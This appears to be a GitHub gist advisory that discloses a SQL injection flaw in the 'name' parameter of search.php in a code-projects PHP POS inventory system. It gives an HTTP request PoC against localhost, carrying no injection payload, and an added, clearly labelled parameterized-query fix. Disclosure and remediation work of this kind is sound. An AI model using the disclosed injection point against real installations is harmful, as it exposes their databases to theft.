POS_sql_5.md (secret gist), created by Masamuneee on January 2, 2025 09:26
# pos-inventory-system-in-php has a SQL injection vulnerability in search.php via the name parameter

## supplier

https://code-projects.org/pos-inventory-system-using-php-source-code/

## Vulnerability file

search.php via name parameter

## Description

In /user/search.php, there is a SQL injection vulnerability. The parameter that can be controlled is $search. The script places the search value into the SQL statement without any restrictions. A malicious attacker could exploit this vulnerability to obtain sensitive information from the server database.

## PoC

```
POST /POS_inventory/user/search.php HTTP/1.1
Host: localhost
Content-Length: 11
sec-ch-ua-platform: "Windows"
Accept-Language: en-US,en;q=0.9
sec-ch-ua: "Chromium";v="131", "Not_A Brand";v="24"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=efr9d42glf5s6l2qp92e9rk9g1
Connection: keep-alive

name=1&ss=1
```

## Author: Masamune
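For the flaw in the Description above, a parameterized form of such a search handler, as an added example that is not code from this gist or from the project. The `products` table and its columns, the `pos_app` account, the `POS_DB_PASS` environment variable, the `LIKE` lookup and the JSON response are all assumptions, since the source of search.php is not shown on this page.

```php
<?php
declare(strict_types=1);

// Added example. Table, columns, credentials and JSON output are assumptions;
// the project's real search.php is not shown in this advisory.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

/** Escape LIKE wildcards so the term is matched literally (escape char: |). */
function escape_like(string $term): string
{
    return str_replace(['|', '%', '_'], ['||', '|%', '|_'], $term);
}

/** Look up products by name; the term only ever reaches MySQL as bound data. */
function search_products(mysqli $db, string $term, int $limit = 50): array
{
    $term = trim($term);
    if ($term === '' || strlen($term) > 100) {
        return [];                       // reject empty or oversized input early
    }
    $pattern = '%' . escape_like($term) . '%';
    $stmt = $db->prepare(
        "SELECT product_id, product_name, price
           FROM products
          WHERE product_name LIKE ? ESCAPE '|'
          ORDER BY product_name
          LIMIT ?"
    );
    $stmt->bind_param('si', $pattern, $limit);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC); // needs mysqlnd
    $stmt->close();
    return $rows;
}

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    $name = $_POST['name'] ?? '';
    if (!is_string($name)) {             // name[]=... arrives as an array
        http_response_code(400);
        exit;
    }
    $db = new mysqli('localhost', 'pos_app', getenv('POS_DB_PASS') ?: '', 'pos_inventory');
    $db->set_charset('utf8mb4');
    header('Content-Type: application/json; charset=utf-8');
    echo json_encode(search_products($db, $name));
}
```

Because the SQL text is fixed and the search term is bound separately, quotes or SQL keywords in `name` cannot change the statement; the database account used should also be limited to `SELECT` on the tables the search needs.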